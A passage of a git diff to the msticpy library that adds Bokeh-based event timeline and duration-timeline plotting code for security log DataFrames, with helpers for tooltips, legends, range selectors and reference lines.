+    ref_col: str = kwargs.pop("ref_col", None)
+    ref_times: List[Tuple[datetime, str]] = kwargs.pop("ref_times", None)
+    value_col = value_col or kwargs.pop("y", None)
+    if not value_col:
+        raise ValueError("Must supply either `value_col` or `y` parameter.")
+
+    ref_time, ref_label = _get_ref_event_time(**kwargs)
+
+    if source_columns is None:
+        source_columns = [value_col]
+    if value_col not in source_columns:
+        source_columns.append(value_col)
+    check_df_columns(
+        data, source_columns + [time_column], _TIMELINE_HELP, "display_timeline_values"
+    )
+    data = ensure_df_datetimes(data=data, columns=time_column)
+    graph_df, group_count_df, tool_tip_columns, series_count = _create_data_grouping(
+        data, source_columns, time_column, group_by, color
+    )
+
+    tooltips, formatters = _create_tool_tips(data, tool_tip_columns)
+    hover = HoverTool(tooltips=tooltips, formatters=formatters)
+
+    # Create the Plot figure
+    title = title or "Timeline"
+    min_time = graph_df[time_column].min()
+    max_time = graph_df[time_column].max()
+    start_range = min_time - ((max_time - min_time) * 0.1)
+    end_range = max_time + ((max_time - min_time) * 0.1)
+    height = height or _calc_auto_plot_height(series_count)
+
+    plot = figure(
+        x_range=(start_range, end_range),
+        min_border_left=50,
+        plot_height=height,
+        plot_width=width,
+        x_axis_label="Event Time",
+        x_axis_type="datetime",
+        x_minor_ticks=10,
+        y_axis_label=value_col,
+        tools=[hover, "xwheel_zoom", "box_zoom", "reset", "save", "xpan"],
+        toolbar_location="above",
+        title=title,
+    )
+    plot.yaxis.visible = show_yaxis
+    plot.ygrid.minor_grid_line_color = "navy"
+    plot.ygrid.minor_grid_line_alpha = 0.1
+    plot.ygrid.grid_line_color = "navy"
+    plot.ygrid.grid_line_alpha = 0.3
+    plot.xgrid.minor_grid_line_color = "navy"
+    plot.xgrid.minor_grid_line_alpha = 0.1
+    plot.xgrid.grid_line_color = "navy"
+    plot.xgrid.grid_line_alpha = 0.3
+
+    # set the tick datetime formatter
+    plot.xaxis[0].formatter = _get_tick_formatter()
+
+    # plot groups individually so that we can create an interactive legend
+    if group_by:
+        legend_items = []
+        for _, group_id in group_count_df[group_by].items():
+            first_group_item = graph_df[graph_df[group_by] == group_id].iloc[0]
+            legend_label = str(first_group_item[group_by])
+            inline_legend = str(group_id)
+            group_color = first_group_item["color"]
+            row_source = ColumnDataSource(graph_df[graph_df[group_by] == group_id])
+            p_series = []
+            # create default plot args
+            plot_args: Dict[str, Any] = dict(
+                x=time_column, alpha=0.7, source=row_source
+            )
+            if legend_pos != "none":
+                plot_args["legend_label"] = str(inline_legend)
+
+            if "vbar" in plot_kinds:
+                p_series.append(
+                    plot.vbar(top=value_col, width=4, color="color", **plot_args)
+                )
+            if "circle" in plot_kinds:
+                p_series.append(
+                    plot.circle(y=value_col, size=4, color="color", **plot_args)
+                )
+            if "line" in plot_kinds:
+                p_series.append(
+                    plot.line(
+                        y=value_col, line_width=2, line_color=group_color, **plot_args
+                    )
+                )
+            if not inline_legend:
+                legend_items.append((legend_label, p_series))
+
+        if legend_pos == "inline":
+            # Position the inline legend
+            plot.legend.location = "top_left"
+            plot.legend.click_policy = "hide"
+        elif legend_pos in {"left", "right"}:
+            # Create the legend box outside of the plot area
+            ext_legend = Legend(
+                items=legend_items,
+                location="center",
+                click_policy="hide",
+                label_text_font_size="8pt",
+            )
+            plot.add_layout(ext_legend, legend_pos)
+    else:
+        plot_args = dict(
+            x=time_column, color=color, alpha=0.7, source=ColumnDataSource(graph_df)
+        )
+        if "vbar" in plot_kinds:
+            plot.vbar(top=value_col, width=4, **plot_args)
+        if "circle" in plot_kinds:
+            plot.circle(y=value_col, size=4, **plot_args)
+        if "line" in plot_kinds:
+            plot.line(y=value_col, line_width=2, **plot_args)
+
+    # if we have a reference, plot the time as a line
+    if ref_time is not None:
+        _add_ref_line(plot, ref_time, ref_label, data[value_col].max())
+    elif ref_events is not None or ref_times is not None:
+        _plot_ref_events(
+            plot=plot,
+            ref_events=ref_events,
+            time_col=ref_time_col,
+            group_count=series_count,
+            ref_col=ref_col,
+            ref_times=ref_times,
+        )
+
+    if show_range:
+        rng_select = _create_range_tool(
+            data=graph_df,
+            min_time=min_time,
+            max_time=max_time,
+            plot_range=plot.x_range,
+            width=width,
+            height=height,
+            time_column=time_column,
+        )
+        plot_layout = column(plot, rng_select)
+    else:
+        plot_layout = plot
+
+    if not hide:
+        show(plot_layout)
+    return plot_layout
+
+
+# pylint: enable=invalid-name,too-many-locals, too-many-statements, too-many-branches
+
+
+# pylint: disable=too-many-locals, too-many-statements, too-many-branches
+def _display_timeline_dict(data: dict, **kwargs) -> figure:  # noqa: C901, MC0001
+    """
+    Display a timeline of events.
+
+    Parameters
+    ----------
+    data : dict
+        Data points to plot on the timeline.
+            Need to contain:
+                Key - Name of data type to be displayed in legend
+                Value - dict of data containing:
+                    data : pd.DataFrame
+                        Data to plot
+                    time_column : str
+                        Name of the timestamp column
+                    source_columns : list
+                        List of source columns to use in tooltips
+                    color: str
+                        Color of datapoints for this data
+    Other Parameters
+    ----------------
+    ref_time : datetime, optional
+        Input reference line to display (the default is None)
+    title : str, optional
+        Title to display (the default is None)
+    time_column : str, optional
+        Name of the timestamp column
+        (the default is 'TimeGenerated')
+    legend: str, optional
+        Where to position the legend
+        None, left, right or inline (default is None)
+    yaxis : bool, optional
+        Whether to show the yaxis and labels
+    range_tool : bool, optional
+        Show the the range slider tool (default is True)
+    source_columns : list, optional
+        List of default source columns to use in tooltips
+        (the default is None)
+    height : int, optional
+        The height of the plot figure
+        (the default is auto-calculated height)
+    width : int, optional
+        The width of the plot figure (the default is 900)
+    ref_events : pd.DataFrame, optional
+        Add references line/label using the event times in the dataframe.
+        (the default is None)
+    ref_time_col : str, optional
+        Add references line/label using the this column in `ref_events`
+        for the time value (x-axis).
+        (this defaults the value of the `time_column` parameter or 'TimeGenerated'
+        `time_column` is None)
+    ref_col : str, optional
+        The column name to use for the label from `ref_events`
+        (the default is None)
+    ref_times : List[Tuple[datetime, str]], optional
+        Add one or more reference line/label using (the default is None)
+
+    Returns
+    -------
+    figure
+        The bokeh plot figure.
+
+    """
+    reset_output()
+    output_notebook()
+
+    height: int = kwargs.pop("height", None)
+    width: int = kwargs.pop("width", 900)
+    ref_time: Any = kwargs.pop("ref_time", None)
+    ref_label: str = kwargs.pop("ref_label", None)
+    title: str = kwargs.pop("title", None)
+    legend_pos: str = kwargs.pop("legend", None)
+    show_yaxis: bool = kwargs.pop("yaxis", False)
+    show_range: bool = kwargs.pop("range_tool", True)
+    xgrid: bool = kwargs.pop("xgrid", True)
+    ygrid: bool = kwargs.pop("ygrid", False)
+    hide: bool = kwargs.pop("hide", False)
+    ref_events: pd.DataFrame = kwargs.pop("ref_events", None)
+    ref_col: str = kwargs.pop("ref_col", None)
+    ref_time_col: str = kwargs.pop(
+        "ref_time_col", kwargs.get("time_column", "TimeGenerated")
+    )
+    ref_times: List[Tuple[datetime, str]] = kwargs.pop("ref_times", None)
+
+    tool_tip_columns, min_time, max_time = _unpack_data_series_dict(data, **kwargs)
+    series_count = len(data)
+
+    tooltips, formatters = _create_tool_tips(data, tool_tip_columns)
+    hover = HoverTool(tooltips=tooltips, formatters=formatters)
+
+    title = f"Timeline: {title}" if title else "Event Timeline"
+
+    start_range, end_range, min_time, max_time = _get_time_bounds(min_time, max_time)
+    height = height or _calc_auto_plot_height(len(data))
+    y_range = ((-1 / series_count), series_count - 1 + (1 / series_count))
+    plot = figure(
+        x_range=(start_range, end_range),
+        y_range=y_range,
+        min_border_left=50,
+        plot_height=height,
+        plot_width=width,
+        x_axis_label="Event Time",
+        x_axis_type="datetime",
+        x_minor_ticks=10,
+        tools=[hover, "xwheel_zoom", "box_zoom", "reset", "save", "xpan"],
+        title=title,
+    )
+
+    _set_axes_and_grids(data, plot, show_yaxis, ygrid, xgrid)
+
+    # Create plot bar to act as as range selector
+    rng_select = _create_range_tool(
+        data=data,
+        min_time=min_time,
+        max_time=max_time,
+        plot_range=plot.x_range,
+        width=width,
+        height=height,
+    )
+
+    # set the tick datetime formatter
+    plot.xaxis[0].formatter = _get_tick_formatter()
+    # plot the data
+    _plot_series(data, plot, legend_pos)
+
+    if ref_time is not None:
+        _add_ref_line(plot, ref_time, ref_label, len(data))
+    elif ref_events is not None or ref_times is not None:
+        _plot_ref_events(
+            plot=plot,
+            ref_events=ref_events,
+            time_col=ref_time_col,
+            group_count=series_count,
+            ref_col=ref_col,
+            ref_times=ref_times,
+        )
+
+    plot_layout = column(plot, rng_select) if show_range else plot
+    if not hide:
+        show(plot_layout)
+
+    return plot_layout
+
+
+# pylint: enable=too-many-locals, too-many-statements, too-many-branches
+
+
+def _plot_series(data, plot, legend_pos):
+    """Plot data series and add legend."""
+    # plot groups individually so that we can create an interactive legend
+    # if legend_pos is "inline", we add add the normal legend inside the plot
+    # if legend_pos is "left" or "right", we add the legend to the side
+    if len(data) > 1 and not legend_pos:
+        legend_pos = "left"
+    legend_items = []
+    for ser_name, series_def in data.items():
+
+        if legend_pos == "inline":
+            p_series = plot.diamond(
+                x=series_def["time_column"],
+                y="y_index",
+                color=series_def["color"],
+                alpha=0.5,
+                size=10,
+                source=series_def["source"],
+                legend_label=str(ser_name),
+            )
+        else:
+            p_series = plot.diamond(
+                x=series_def["time_column"],
+                y="y_index",
+                color=series_def["color"],
+                alpha=0.5,
+                size=10,
+                source=series_def["source"],
+            )
+        if legend_pos in ["left", "right"]:
+            legend_items.append(
+                LegendItem(
+                    label=str(ser_name),
+                    renderers=[p_series],
+                )
+            )
+
+    if legend_pos == "inline":
+        # Position the inline legend
+        plot.legend.location = "center_left"
+        plot.legend.click_policy = "hide"
+    elif legend_pos in ["left", "right"]:
+        # Create the legend box outside of the plot area
+        ext_legend = Legend(
+            items=legend_items[::-1],  # the legend is in the wrong order otherwise
+            location="center",
+            click_policy="hide",
+            label_text_font_size="8pt",
+        )
+        plot.add_layout(ext_legend, legend_pos)
+
+
+def check_df_columns(
+    data: pd.DataFrame, req_columns: List[str], help_uri: str, plot_type: str
+):
+    """
+    Check that specified columns are in the DataFrame.
+
+    Parameters
+    ----------
+    data : pd.DataFrame
+        [description]
+    req_columns : List[str]
+        [description]
+    help_uri : str
+        [description]
+    plot_type : str
+        [description]
+
+    Raises
+    ------
+    MsticpyParameterError
+        If one or more columns not found in `data`
+
+    """
+    missing_cols = set(req_columns) - set(data.columns)
+    if missing_cols:
+        raise MsticpyParameterError(
+            title="Columns not found in DataFrame",
+            help_uri=help_uri.format(plot_type=plot_type),
+            parameter=missing_cols,
+        )
+
+
+def _set_axes_and_grids(data, plot, show_yaxis, ygrid, xgrid):
+    """Set the axes visibility and grids according to parameters."""
+    plot.yaxis.visible = show_yaxis
+    if show_yaxis and data:
+        y_labels = {ser_def["y_index"]: str(lbl) for lbl, ser_def in data.items()}
+        plot.yaxis.major_label_overrides = y_labels
+    if ygrid:
+        plot.ygrid.minor_grid_line_color = "navy"
+        plot.ygrid.minor_grid_line_alpha = 0.1
+        plot.ygrid.grid_line_color = "navy"
+        plot.ygrid.grid_line_alpha = 0.3
+    else:
+        plot.ygrid.grid_line_color = None
+    if xgrid:
+        plot.xgrid.minor_grid_line_color = "navy"
+        plot.xgrid.minor_grid_line_alpha = 0.3
+    else:
+        plot.xgrid.grid_line_color = None
+
+
+def _get_time_bounds(min_time, max_time):
+    """Return start and end range, coping with out-of-bounds error."""
+    try:
+        start_range = min_time - ((max_time - min_time) * 0.1)
+        end_range = max_time + ((max_time - min_time) * 0.1)
+    except OutOfBoundsDatetime:
+        min_time = min_time.to_pydatetime()
+        max_time = max_time.to_pydatetime()
+        start_range = min_time - ((max_time - min_time) * 0.1)
+        end_range = max_time + ((max_time - min_time) * 0.1)
+    return start_range, end_range, min_time, max_time
+
+
+# pylint: disable=too-many-locals
+def _unpack_data_series_dict(data, **kwargs):
+    time_column: str = kwargs.pop("time_column", "TimeGenerated")
+    source_columns: list = kwargs.pop("source_columns", None)
+
+    # Process the input dictionary
+    # Take each item that is passed and fill in blanks and add a y_index
+    tool_tip_columns: Set[str] = set()
+    min_time = None
+    max_time = None
+    y_index = 0
+
+    # Create a color map in case colors have not been specified
+    # (Shift the Viridis palatte so we lose the top, harder-to-see colors)
+    series_count = len(data)
+    colors, palette_size = _get_color_palette(series_count)
+
+    for ser_name, series_def in data.items():
+        data_columns: Set[str] = set()
+        series_data = series_def["data"]
+
+        if (
+            series_data is None
+            or not isinstance(series_data, pd.DataFrame)
+            or series_data.empty
+        ):
+            print(f"No data to plot for series {ser_name}.")
+            continue
+
+        # if the series has source columns, use those
+        # or fall back to global source cols or defaults
+        series_def_src_cols = _get_def_source_cols(series_data, source_columns)
+        src_cols = series_def.get("source_columns", series_def_src_cols)
+        data_columns.update(src_cols or series_def_src_cols)
+
+        time_col = series_def.get("time_column", None)
+        if not time_col:
+            time_col = time_column
+            series_def["time_column"] = time_col
+        # ensure named time columns are in datetime format
+        series_data = ensure_df_datetimes(data=series_data, columns=time_col)
+        data_columns.update([time_col])
+        # add the data columns to the tool tip column set
+        tool_tip_columns.update(data_columns)
+
+        # Create the Column data source to plot
+        graph_df = series_data[list(data_columns)].copy()
+        graph_df["y_index"] = y_index
+        series_def["y_index"] = y_index
+        ser_color = series_def.get("color", None)
+        if not ser_color:
+            ser_color = colors[y_index % palette_size]
+            series_def["color"] = ser_color
+        # Wrap tooltip lines longer than 50 chars
+        _wrap_df_columns(graph_df, 50)
+        series_def["source"] = ColumnDataSource(graph_df)
+        y_index += 1
+
+        # calculate min/max time from this set
+        if min_time is None:
+            min_time = series_data[time_col].min()
+            max_time = series_data[time_col].max()
+        else:
+            min_time = min(min_time, series_data[time_col].min())
+            max_time = max(max_time, series_data[time_col].max())
+
+    return tool_tip_columns, min_time, max_time
+
+
+# pylint: enable=too-many-locals
+
+
+def _get_def_source_cols(data, source_columns):
+    if not source_columns:
+        data_columns = set()
+        if all(
+            col in data.columns for col in ["NewProcessName", "EventID", "CommandLine"]
+        ):
+            data_columns = set(["NewProcessName", "EventID", "CommandLine"])
+    else:
+        data_columns = set(source_columns)
+    return data_columns
+
+
+def _create_data_grouping(data, source_columns, time_column, group_by, color):
+    data_columns = _get_def_source_cols(data, source_columns)
+    # If the time column not explicitly specified in source_columns, add it
+    data_columns.add(time_column)
+    tool_tip_columns = data_columns.copy()
+    # create group frame so that we can color each group separately
+    if group_by:
+        group_count_df = (
+            data[[group_by, time_column]]
+            .groupby(group_by)
+            .count()
+            .reset_index()
+            .rename(columns={time_column: "count"})
+        )
+        group_count_df["y_index"] = group_count_df.index
+
+        # Shift the Viridis palatte so we lose the top, harder-to-see colors
+        series_count = len(group_count_df)
+        colors, palette_size = _get_color_palette(series_count)
+        group_count_df["color"] = group_count_df.apply(
+            lambda x: colors[x.y_index % palette_size], axis=1
+        )
+        # re-join with the original data
+        data_columns.update([group_by, "y_index", "color"])
+        clean_data = data.drop(columns=["y_index", "color"], errors="ignore")
+        graph_df = clean_data.merge(group_count_df, on=group_by)[list(data_columns)]
+    else:
+        graph_df = data[list(data_columns)].copy()
+        graph_df["color"] = color
+        graph_df["y_index"] = 1
+        series_count = 1
+        group_count_df = None
+    return graph_df, group_count_df, tool_tip_columns, series_count
+
+
+# pylint: enable=too-many-arguments
+
+
+def _create_dict_from_grouping(data, source_columns, time_column, group_by, color):
+    data_columns = _get_def_source_cols(data, source_columns)
+    # If the time column not explicitly specified in source_columns, add it
+    data_columns.add(time_column)
+
+    series_dict: Dict[str, Dict] = {}
+    # create group frame so that we can color each group separately
+    if group_by:
+        data_columns.add(group_by)
+        grouped_data = data[list(data_columns)].groupby(group_by)
+
+        series_count = len(grouped_data)
+        colors, palette_size = _get_color_palette(series_count)
+        for color_index, (group_name, group_df) in enumerate(grouped_data):
+            series_dict[str(group_name)] = dict(
+                data=group_df,
+                time_column=time_column,
+                source_columns=source_columns,
+                color=colors[color_index % palette_size],
+            )
+    else:
+        group_df = data[list(data_columns)].copy()
+        series_dict["unnamed series"] = dict(
+            data=group_df,
+            time_column=time_column,
+            source_columns=source_columns,
+            color=color,
+        )
+
+    return series_dict
+
+
+def _get_ref_event_time(**kwargs) -> Tuple[Optional[Any], Union[Any, str]]:
+    """Extract the reference time from kwargs."""
+    ref_alert = kwargs.get("alert", None)
+    if ref_alert is not None:
+        ref_event = ref_alert
+        ref_label = "Alert time"
+    else:
+        ref_event = kwargs.get("ref_event", None)
+        ref_label = "Event time"
+
+    if ref_event is not None:
+        if isinstance(ref_event, pd.DataFrame):
+            ref_event = ref_event.iloc[0]
+        ref_time = getattr(ref_event, "StartTimeUtc", None)
+        if not ref_time:
+            ref_time = getattr(ref_event, "TimeGenerated", None)
+    else:
+        ref_time = kwargs.get("ref_time", None)
+        ref_label = "Ref time"
+    return ref_time, kwargs.get("ref_label", ref_label)  # type: ignore
+
+
+def _get_datetime_tooltip(col: str, dataset: pd.DataFrame):
+    """Return tooltip and formatter entries for column."""
+    if " " in col:
+        disp_col = col.replace(" ", "_")
+        tt_col = f"{{{col}}}"
+    else:
+        disp_col = tt_col = col
+    if col in dataset and is_datetime64_any_dtype(dataset[col]):
+        col_tooltip = f"@{tt_col}{{%F %T.%3N}}"
+        col_fmt: Dict[Any, Any] = {f"@{tt_col}": "datetime"}
+    else:
+        col_tooltip = f"@{tt_col}"
+        col_fmt = {}
+    return disp_col, col_tooltip, col_fmt
+
+
+def _create_tool_tips(
+    data: Union[pd.DataFrame, Dict[str, pd.DataFrame]], columns: List[str]
+) -> Tuple[List[Tuple[str, str]], Dict[str, str]]:
+    """Create formatting for tool tip columns."""
+    formatters: Dict[str, str] = {}
+    # if this is a dict we need to unpack each dataframe and process
+    # the tooltip columns for all of the data sets.
+    if isinstance(data, dict):
+        tool_tip_dict = {}
+        for data_set in data.values():
+            data_df = data_set.get("data", {})
+            for col in columns:
+                disp_col, col_tooltip, col_fmt = _get_datetime_tooltip(col, data_df)
+                tool_tip_dict[disp_col] = col_tooltip
+                formatters.update(col_fmt)
+        return list(tool_tip_dict.items()), formatters
+
+    # If just a dataframe we just process the columns against this
+    tool_tip_items = []
+    for col in columns:
+        disp_col, col_tooltip, col_fmt = _get_datetime_tooltip(col, data)
+        tool_tip_items.append((disp_col, col_tooltip))
+        formatters.update(col_fmt)
+
+    return tool_tip_items, formatters
+
+
+def _get_color_palette(series_count):
+    palette_size = min(256, series_count + int(series_count / 5))
+    return viridis(palette_size), palette_size
+
+
+def _wrap_df_columns(data: pd.DataFrame, wrap_len: int = 50):
+    """Wrap any string columns."""
+    if not data.empty:
+        for col in data.columns:
+            if isinstance(data[col].iloc[0], str):
+                data[col] = data[col].str.wrap(wrap_len)
+
+
+def _get_tick_formatter() -> DatetimeTickFormatter:
+    """Return tick formatting for different zoom levels."""
+    # '%H:%M:%S.%3Nms
+    tick_format = DatetimeTickFormatter()
+    tick_format.days = ["%m-%d %H:%M"]
+    tick_format.hours = ["%H:%M:%S"]
+    tick_format.minutes = ["%H:%M:%S"]
+    tick_format.seconds = ["%H:%M:%S"]
+    tick_format.milliseconds = ["%H:%M:%S.%3N"]
+    return tick_format
+
+
+def _calc_auto_plot_height(group_count):
+    """Dynamic calculation of plot height."""
+    ht_per_row = 25 if group_count > 15 else 40
+    return max(ht_per_row * group_count, 300)
+
+
+# pylint: disable=too-many-arguments, invalid-name, too-many-locals
+def _create_range_tool(
+    data,
+    min_time,
+    max_time,
+    plot_range,
+    width,
+    height,
+    time_column: str = None,
+    y: str = "y_index",
+):
+    """Create plot bar to act as as range selector."""
+    ext_min = min_time - ((max_time - min_time) * 0.15)
+    ext_max = max_time + ((max_time - min_time) * 0.15)
+    plot_height = max(120, int(height * 0.20))
+    rng_select = figure(
+        x_range=(ext_min, ext_max),
+        title="Range Selector",
+        plot_height=plot_height,
+        plot_width=width,
+        x_axis_type="datetime",
+        y_axis_type=None,
+        tools="",
+        toolbar_location=None,
+    )
+    help_str = (
+        "Drag the middle or edges of the selection box to change "
+        + "the range in the main chart"
+    )
+    rng_select.add_layout(
+        Title(text=help_str, align="right", text_font_size="10px"), "below"
+    )
+    rng_select.xaxis[0].formatter = _get_tick_formatter()
+    if isinstance(data, dict):
+        for _, series_def in data.items():
+            rng_select.circle(
+                x=series_def["time_column"],
+                y=y,
+                color=series_def["color"],
+                source=series_def["source"],
+            )
+    elif isinstance(data, pd.DataFrame):
+        rng_select.circle(
+            x=time_column, y=y, color="blue", source=ColumnDataSource(data)
+        )
+
+    range_tool = RangeTool(x_range=plot_range)
+    range_tool.overlay.fill_color = "navy"
+    range_tool.overlay.fill_alpha = 0.2
+    rng_select.ygrid.grid_line_color = None
+    rng_select.add_tools(range_tool)
+    rng_select.toolbar.active_multi = range_tool
+    return rng_select
+
+
+# pylint: enable=too-many-arguments
+
+
+def _add_ref_line(plot, ref_time, ref_text="Ref time", series_count=1, index=0):
+    """Add a reference marker line and label at `ref_time`."""
+    ref_label_tm = pd.Timestamp(ref_time)
+    index = min(index, series_count)
+    plot.line(
+        x=[ref_label_tm, ref_label_tm],
+        y=[0, series_count],
+        line_width=1,
+        line_color="red",
+        line_dash="dashed",
+        line_alpha=0.5,
+    )
+    ref_label = Label(
+        x=ref_label_tm,
+        y=0,
+        y_offset=10 + (10 * index),
+        x_units="data",
+        y_units="data",
+        text=f"< {ref_text}",
+        text_font_size="8pt",
+        text_alpha=0.5,
+        render_mode="css",
+        border_line_color="red",
+        border_line_alpha=0.3,
+        background_fill_color="white",
+        background_fill_alpha=0.3,
+    )
+
+    plot.add_layout(ref_label)
+
+
+def _plot_ref_events(
+    plot: figure,
+    time_col: str,
+    group_count: int,
+    ref_events: Optional[pd.DataFrame] = None,
+    ref_col: Optional[str] = None,
+    ref_times: Optional[List[Tuple[datetime, str]]] = None,
+):
+    """Plot reference lines/labels."""
+    if ref_events is not None:
+        if isinstance(ref_events, pd.Series):
+            ref_events = pd.DataFrame(ref_events)
+        for idx, event in enumerate(ref_events.itertuples()):
+            evt_time = event._asdict()[time_col]
+            evt_label = (
+                event._asdict()[ref_col] if ref_col else f"reference {event.Index}"
+            )
+            _add_ref_line(
+                plot=plot,
+                ref_time=evt_time,
+                ref_text=evt_label,
+                series_count=group_count,
+                index=idx,
+            )
+    elif ref_times:
+        for idx, (evt_time, evt_label) in enumerate(ref_times):
+            evt_label = evt_label or f"reference {idx}"
+            _add_ref_line(
+                plot=plot,
+                ref_time=evt_time,
+                ref_text=evt_label,
+                series_count=group_count,
+                index=idx,
+            )
diff --git a/msticpy/nbtools/timeline_duration.py b/msticpy/nbtools/timeline_duration.py
new file mode 100644
index 000000000..1bcc43f68
--- /dev/null
+++ b/msticpy/nbtools/timeline_duration.py
@@ -0,0 +1,269 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Timeline duration control."""
+from datetime import datetime
+from typing import Iterable, List, Optional, Tuple, Union
+
+import attr
+import pandas as pd
+from bokeh.io import output_notebook, show
+from bokeh.models import ColumnDataSource, HoverTool, LayoutDOM
+
+# pylint: enable=no-name-in-module
+from bokeh.plotting import figure, reset_output
+from bokeh.layouts import column
+from bokeh.transform import dodge
+
+from ..common.utility import check_kwargs
+from ..data.query_defns import ensure_df_datetimes
+from .timeline import (
+    _create_tool_tips,
+    _create_range_tool,
+    _calc_auto_plot_height,
+    _get_time_bounds,
+    _set_axes_and_grids,
+    _get_tick_formatter,
+    _plot_ref_events,
+    check_df_columns,
+)
+
+# pylint: disable=unused-import
+# Importing to activate pandas accessors
+from .timeline_pd_accessor import TimeLineAccessor  # noqa F401
+
+# pylint: enable=unused-import
+
+from .._version import VERSION
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+_TIMELINE_HELP = (
+    "https://msticpy.readthedocs.io/en/latest/msticpy.nbtools.html"
+    "#msticpy.nbtools.timeline_duration.{plot_type}"
+)
+
+
+@attr.s(auto_attribs=True)
+class PlotParams:
+    """Plot params for time_duration."""
+
+    height: Optional[int] = None
+    width: int = 900
+    title: Optional[str] = None
+    yaxis: bool = True
+    range_tool: bool = True
+    xgrid: bool = True
+    ygrid: bool = False
+    hide: bool = False
+    color: str = "navy"
+    ylabel_cols: Iterable[str] = attr.Factory(list)
+    ref_events: Optional[pd.DataFrame] = None
+    ref_col: Optional[str] = None
+    ref_times: Optional[List[Tuple[datetime, str]]] = None
+    source_columns: List = []
+
+    @classmethod
+    def field_list(cls) -> List[str]:
+        """Return field names as a list."""
+        return list(attr.fields_dict(cls).keys())
+
+
+# pylint: disable=too-many-locals
+
+
+def display_timeline_duration(
+    data: pd.DataFrame,
+    group_by: Union[Iterable[str], str],
+    time_column: str = "TimeGenerated",
+    end_time_column: Optional[str] = None,
+    **kwargs,
+) -> LayoutDOM:  # noqa: C901, MC0001
+    """
+    Display a duration timeline of events grouped by one or more columns.
+
+    Parameters
+    ----------
+    data : pd.DataFrame
+        Data to plot
+    group_by : Union[Iterable[str], str]
+        The column name or iterable of column names to group the data by.
+    time_column : str
+        Primary time column - will be used to calculate the
+        start time of the duration for each group.
+        If `end_time_column` is not specified it will also be used to
+        calculate the end time.
+    end_time_column : Optional[str]
+        If supplied, it will be used to calculate the end time
+        of the duration for each group.
+
+    Other Parameters
+    ----------------
+    title : str, optional
+        Title to display (the default is None)
+    ylabel_cols : Optional[Iterable[str]], optional
+        The subset of the group columns to use for the y-axis labels.
+    yaxis : bool, optional
+        Whether to show the yaxis and labels
+    range_tool : bool, optional
+        Show the the range slider tool (default is True)
+    source_columns : list, optional
+        List of default source columns to use in tooltips
+        (the default is None)
+    height : int, optional
+        The height of the plot figure
+        (the default is auto-calculated height)
+    width : int, optional
+        The width of the plot figure (the default is 900)
+    color : str
+        Default series color (default is "navy")
+    ref_events : pd.DataFrame, optional
+        Add references line/label using the event times in the dataframe.
+        (the default is None)
+    ref_col : str, optional
+        The column name to use for the label from `ref_events`
+        (the default is None)
+    ref_times : List[Tuple[datetime, str]], optional
+        Add one or more reference line/label using (the default is None)
+
+    Returns
+    -------
+    LayoutDOM
+        The bokeh plot figure.
+
+    """
+    reset_output()
+    output_notebook()
+
+    check_kwargs(kwargs, PlotParams.field_list())
+    param = PlotParams(**kwargs)
+
+    group_by = [group_by] if isinstance(group_by, str) else list(group_by)
+    end_time_column = end_time_column or time_column
+    data = ensure_df_datetimes(data, columns=list(set([time_column, end_time_column])))
+    check_df_columns(
+        data,
+        group_by + [end_time_column, time_column],
+        _TIMELINE_HELP,
+        "display_timeline_duration",
+    )
+    grouped_data = _group_durations(data, group_by, time_column, end_time_column)
+    min_time = grouped_data["start_time"].min()
+    max_time = grouped_data["end_time"].max()
+
+    # Create Bokeh Column Data Sources
+    col_src = ColumnDataSource(grouped_data)
+    # Re-join original data to grouped data
+    all_data = data.merge(grouped_data, on=group_by)
+    all_data_src = ColumnDataSource(all_data)
+
+    tool_tip_cols = [*group_by, "start_time", "end_time"]
+    if "source_columns" in kwargs:
+        tool_tip_cols += kwargs["source_columns"]
+
+    tooltips, formatters = _create_tool_tips(grouped_data, tool_tip_cols)
+    hover = HoverTool(tooltips=tooltips, formatters=formatters)
+
+    title = (
+        f"Timeline: {param.title}"
+        if param.title
+        else f"Event Duration Timeline for {', '.join(group_by)}"
+    )
+
+    start_range, end_range, min_time, max_time = _get_time_bounds(min_time, max_time)
+    height = param.height or _calc_auto_plot_height(len(grouped_data))
+    # Concatenate ylabel columns to display on y-axis
+    if len(group_by) > 1:
+        y_range = grouped_data[group_by[0]].str.cat(
+            grouped_data[group_by[1:]], sep=" / "
+        )
+    else:
+        y_range = grouped_data[group_by[0]]
+
+    plot = figure(
+        x_range=(start_range, end_range),
+        y_range=y_range,
+        min_border_left=50,
+        plot_height=height,
+        plot_width=param.width,
+        x_axis_label="Event Time",
+        y_axis_label=", ".join(group_by),
+        x_axis_type="datetime",
+        x_minor_ticks=10,
+        tools=[hover, "xwheel_zoom", "box_zoom", "reset", "save", "xpan"],
+        title=title,
+    )
+
+    # Plot the duration rectangles
+    rect_plot_params = dict(
+        height=0.3, source=col_src, fill_alpha=0.4, color=param.color
+    )
+    plot.rect(x="Center", y=dodge("Row", 0.5), width="Width", **rect_plot_params)
+
+    # Plot the individual events as diamonds
+    plot.diamond(
+        x=time_column,
+        y=dodge("Row", 0.5),
+        color=param.color,
+        alpha=0.5,
+        size=5,
+        source=all_data_src,
+    )
+
+    # Set grid parameters
+    _set_axes_and_grids(None, plot, param.yaxis, param.ygrid, param.xgrid)
+
+    # Create plot bar to act as as range selector
+    rng_select = _create_range_tool(
+        data=all_data,
+        min_time=min_time,
+        max_time=max_time,
+        plot_range=plot.x_range,
+        width=param.width,
+        height=height,
+        time_column=time_column,
+        y="Row",
+    )
+
+    # set the tick datetime formatter
+    plot.xaxis[0].formatter = _get_tick_formatter()
+    _plot_ref_events(
+        plot=plot,
+        ref_events=param.ref_events,
+        time_col=time_column,
+        group_count=len(grouped_data),
+        ref_col=param.ref_col,
+        ref_times=param.ref_times,
+    )
+
+    plot_layout = column(plot, rng_select) if param.range_tool else plot
+    if not param.hide:
+        show(plot_layout)
+
+    return plot_layout
+
+
+# pylint: disable=too-many-locals
+
+
+def _group_durations(
+    data: pd.DataFrame, group_by: List[str], time_column: str, end_time_column: str
+):
+    """Group the data and calculate start and end times."""
+    grouped_data = data.groupby(group_by).agg(
+        start_time=pd.NamedAgg(time_column, "min"),
+        end_time=pd.NamedAgg(end_time_column, "max"),
+    )
+    # If we don't have an endtime for certain types just consider them to be single time events
+    for row in grouped_data.iterrows():
+        if pd.isnull(row[1]["end_time"]):
+            grouped_data.at[row[0], "end_time"] = row[1]["start_time"]
+    grouped_data = grouped_data.reset_index()
+    grouped_data.index.name = "Row"
